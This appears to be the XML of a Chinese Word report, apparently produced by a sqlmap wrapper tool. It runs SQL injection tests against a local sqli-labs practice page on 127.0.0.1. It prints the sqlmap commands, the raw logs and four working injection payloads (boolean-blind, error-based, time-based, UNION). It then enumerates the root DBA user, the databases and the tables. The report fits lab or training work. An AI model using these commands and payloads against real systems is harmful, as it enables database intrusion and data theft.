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127.0.0.1/sqli/Less-1/?id=2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">执行命令:python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=2 --random-agent --dbs  --current-user --current-db --is-db </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>注入参数(方式) : id (GET)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=2' AND 3623=3623 AND 'vBUq'='vBUq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : error-based</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=2' AND (SELECT 5851 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (ELT(5851=5851,1))),0x7170716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HBlq'='HBlq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=2' AND SLEEP(5) AND 'jnma'='jnma</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : Generic UNION query (NULL) - 3 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=-5710' UNION ALL SELECT NULL,CONCAT(0x7178766a71,0x5579635356547777547a496e745a4b537a4c475346664a65766a774f53474b5874474a4445797046,0x7170716271),NULL-- ekrc</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>数据库类型 : MySQL</w:t>
        <w:br/>
        <w:t>服务器版本 : Windows</w:t>
        <w:br/>
        <w:t>服务器语言 : Apache 2.4.23, PHP 5.5.38</w:t>
        <w:br/>
        <w:t>数据库版本 : MySQL &gt;= 5.0</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>网站信息报表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>百度权重  获取失败</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">网站描述  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站标题  http://127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  本地计算机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  点击查询</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>协议类型  HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">页面类型   text/html  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">服务类型   Microsoft-IIS/7.5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127.0.0.1/sqli/Less-1/?id=2 --random-agent --dbs  --current-user --current-db --is-db </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="XiaoLv"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ___</w:t>
        <w:br/>
        <w:t xml:space="preserve">       __H__</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ___ ___["]_____ ___ ___  {1.3.5.109#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16:57:21 /2019-06-01/</w:t>
        <w:br/>
        <w:br/>
        <w:t>[16:57:21] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8' from file 'C:\CODE\个人作品源代码\GET_SQL\ExtrAct-SQL_0.3[sqlmap高版本]\sqlmap\txt\user-agents.txt'</w:t>
        <w:br/>
        <w:t xml:space="preserve">[16:57:22] [INFO] resuming back-end DBMS 'mysql' </w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] testing connection to the target URL</w:t>
        <w:br/>
        <w:t>sqlmap resumed the following injection point(s) from stored session:</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>Parameter: id (GET)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Type: boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=2' AND 3623=3623 AND 'vBUq'='vBUq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: error-based</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=2' AND (SELECT 5851 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (ELT(5851=5851,1))),0x7170716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HBlq'='HBlq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=2' AND SLEEP(5) AND 'jnma'='jnma</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: Generic UNION query (NULL) - 3 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=-5710' UNION ALL SELECT NULL,CONCAT(0x7178766a71,0x5579635356547777547a496e745a4b537a4c475346664a65766a774f53474b5874474a4445797046,0x7170716271),NULL-- ekrc</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] the back-end DBMS is MySQL</w:t>
        <w:br/>
        <w:t>web server operating system: Windows</w:t>
        <w:br/>
        <w:t>web application technology: Apache 2.4.23, PHP 5.5.38</w:t>
        <w:br/>
        <w:t>back-end DBMS: MySQL &gt;= 5.0</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] fetching current user</w:t>
        <w:br/>
        <w:t>current user: 'root@127.0.0.1'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] fetching current database</w:t>
        <w:br/>
        <w:t>current database: 'security'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] testing if current user is DBA</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] fetching current user</w:t>
        <w:br/>
        <w:t>current user is DBA: True</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] fetching database names</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] used SQL query returns 18 entries</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'information_schema'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: '娴嬭瘯'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'challenges'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'dvwa'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'dwvs'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'lang_cms_finds'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'langzi_scan'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'langzi_scan_1'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'langzi_scan_2'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'langzi_scan_3'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'langzii_eyes'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'mysql'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'performance_schema'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'phpmyadmin'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'pikachu'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'security'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'test'</w:t>
        <w:br/>
        <w:t>[16:57:22] [INFO] resumed: 'wenda_anwsion_com'</w:t>
        <w:br/>
        <w:t>available databases [18]:</w:t>
        <w:br/>
        <w:t>[*] challenges</w:t>
        <w:br/>
        <w:t>[*] dvwa</w:t>
        <w:br/>
        <w:t>[*] dwvs</w:t>
        <w:br/>
        <w:t>[*] information_schema</w:t>
        <w:br/>
        <w:t>[*] lang_cms_finds</w:t>
        <w:br/>
        <w:t>[*] langzi_scan</w:t>
        <w:br/>
        <w:t>[*] langzi_scan_1</w:t>
        <w:br/>
        <w:t>[*] langzi_scan_2</w:t>
        <w:br/>
        <w:t>[*] langzi_scan_3</w:t>
        <w:br/>
        <w:t>[*] langzii_eyes</w:t>
        <w:br/>
        <w:t>[*] mysql</w:t>
        <w:br/>
        <w:t>[*] performance_schema</w:t>
        <w:br/>
        <w:t>[*] phpmyadmin</w:t>
        <w:br/>
        <w:t>[*] pikachu</w:t>
        <w:br/>
        <w:t>[*] security</w:t>
        <w:br/>
        <w:t>[*] test</w:t>
        <w:br/>
        <w:t>[*] wenda_anwsion_com</w:t>
        <w:br/>
        <w:t>[*] 娴嬭瘯</w:t>
        <w:br/>
        <w:br/>
        <w:t>[16:57:22] [INFO] fetched data logged to text files under 'C:\Users\langzi\AppData\Local\sqlmap\output\127.0.0.1'</w:t>
        <w:br/>
        <w:br/>
        <w:t>[*] ending @ 16:57:22 /2019-06-01/</w:t>
        <w:br/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>注入参数(方式) : id (GET)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=2' AND 3623=3623 AND 'vBUq'='vBUq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : error-based</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=2' AND (SELECT 5851 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (ELT(5851=5851,1))),0x7170716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HBlq'='HBlq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=2' AND SLEEP(5) AND 'jnma'='jnma</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    注入方式 : UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入标题 : Generic UNION query (NULL) - 3 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    注入攻击 : id=-5710' UNION ALL SELECT NULL,CONCAT(0x7178766a71,0x5579635356547777547a496e745a4b537a4c475346664a65766a774f53474b5874474a4445797046,0x7170716271),NULL-- ekrc</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>数据库类型 : MySQL</w:t>
        <w:br/>
        <w:t>服务器版本 : Windows</w:t>
        <w:br/>
        <w:t>服务器语言 : Apache 2.4.23, PHP 5.5.38</w:t>
        <w:br/>
        <w:t>数据库版本 : MySQL &gt;= 5.0</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>当前用户: 'root@127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>当前数据库: 'security'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>是否有DBA权限: True</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>所有数据库:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>[*] challenges</w:t>
        <w:br/>
        <w:t>[*] dvwa</w:t>
        <w:br/>
        <w:t>[*] dwvs</w:t>
        <w:br/>
        <w:t>[*] information_schema</w:t>
        <w:br/>
        <w:t>[*] lang_cms_finds</w:t>
        <w:br/>
        <w:t>[*] langzi_scan</w:t>
        <w:br/>
        <w:t>[*] langzi_scan_1</w:t>
        <w:br/>
        <w:t>[*] langzi_scan_2</w:t>
        <w:br/>
        <w:t>[*] langzi_scan_3</w:t>
        <w:br/>
        <w:t>[*] langzii_eyes</w:t>
        <w:br/>
        <w:t>[*] mysql</w:t>
        <w:br/>
        <w:t>[*] performance_schema</w:t>
        <w:br/>
        <w:t>[*] phpmyadmin</w:t>
        <w:br/>
        <w:t>[*] pikachu</w:t>
        <w:br/>
        <w:t>[*] security</w:t>
        <w:br/>
        <w:t>[*] test</w:t>
        <w:br/>
        <w:t>[*] wenda_anwsion_com</w:t>
        <w:br/>
        <w:t>[*] 娴嬭瘯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>执行命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python sqlmap.py -u http://127.0.0.1/sqli/Less-1/?id=2 -D security --tables --random-agent </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>返回结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="XiaoLv"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ___</w:t>
        <w:br/>
        <w:t xml:space="preserve">       __H__</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ___ ___[,]_____ ___ ___  {1.3.5.109#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16:57:28 /2019-06-01/</w:t>
        <w:br/>
        <w:br/>
        <w:t>[16:57:28] [INFO] fetched random HTTP User-Agent header value 'Opera/8.50 (Windows NT 4.0; U; zh-cn)' from file 'C:\CODE\个人作品源代码\GET_SQL\ExtrAct-SQL_0.3[sqlmap高版本]\sqlmap\txt\user-agents.txt'</w:t>
        <w:br/>
        <w:t xml:space="preserve">[16:57:29] [INFO] resuming back-end DBMS 'mysql' </w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] testing connection to the target URL</w:t>
        <w:br/>
        <w:t>sqlmap resumed the following injection point(s) from stored session:</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>Parameter: id (GET)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Type: boolean-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: AND boolean-based blind - WHERE or HAVING clause</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=2' AND 3623=3623 AND 'vBUq'='vBUq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: error-based</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=2' AND (SELECT 5851 FROM(SELECT COUNT(*),CONCAT(0x7178766a71,(SELECT (ELT(5851=5851,1))),0x7170716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'HBlq'='HBlq</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0.12 AND time-based blind</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=2' AND SLEEP(5) AND 'jnma'='jnma</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    Type: UNION query</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Title: Generic UNION query (NULL) - 3 columns</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Payload: id=-5710' UNION ALL SELECT NULL,CONCAT(0x7178766a71,0x5579635356547777547a496e745a4b537a4c475346664a65766a774f53474b5874474a4445797046,0x7170716271),NULL-- ekrc</w:t>
        <w:br/>
        <w:t>---</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] the back-end DBMS is MySQL</w:t>
        <w:br/>
        <w:t>web server operating system: Windows</w:t>
        <w:br/>
        <w:t>web application technology: Apache 2.4.23, PHP 5.5.38</w:t>
        <w:br/>
        <w:t>back-end DBMS: MySQL &gt;= 5.0</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] fetching tables for database: 'security'</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] used SQL query returns 4 entries</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] resumed: 'emails'</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] resumed: 'referers'</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] resumed: 'uagents'</w:t>
        <w:br/>
        <w:t>[16:57:29] [INFO] resumed: 'users'</w:t>
        <w:br/>
        <w:t>Database: security</w:t>
        <w:br/>
        <w:t>[4 tables]</w:t>
        <w:br/>
        <w:t>+----------+</w:t>
        <w:br/>
        <w:t>| emails   |</w:t>
        <w:br/>
        <w:t>| referers |</w:t>
        <w:br/>
        <w:t>| uagents  |</w:t>
        <w:br/>
        <w:t>| users    |</w:t>
        <w:br/>
        <w:t>+----------+</w:t>
        <w:br/>
        <w:br/>
        <w:t>[16:57:29] [INFO] fetched data logged to text files under 'C:\Users\langzi\AppData\Local\sqlmap\output\127.0.0.1'</w:t>
        <w:br/>
        <w:br/>
        <w:t>[*] ending @ 16:57:29 /2019-06-01/</w:t>
        <w:br/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>敏感数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>当前数据库下存在如下表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHOng"/>
      </w:pPr>
      <w:r>
        <w:t>Database: security</w:t>
        <w:br/>
        <w:t>[4 tables]</w:t>
        <w:br/>
        <w:t>+----------+</w:t>
        <w:br/>
        <w:t>| emails   |</w:t>
        <w:br/>
        <w:t>| referers |</w:t>
        <w:br/>
        <w:t>| uagents  |</w:t>
        <w:br/>
        <w:t>| users    |</w:t>
        <w:br/>
        <w:t>+----------+</w:t>
        <w:br/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="DaHei"/>
      </w:pPr>
      <w:r>
        <w:t>复现完成，验证存在SQL注入漏洞</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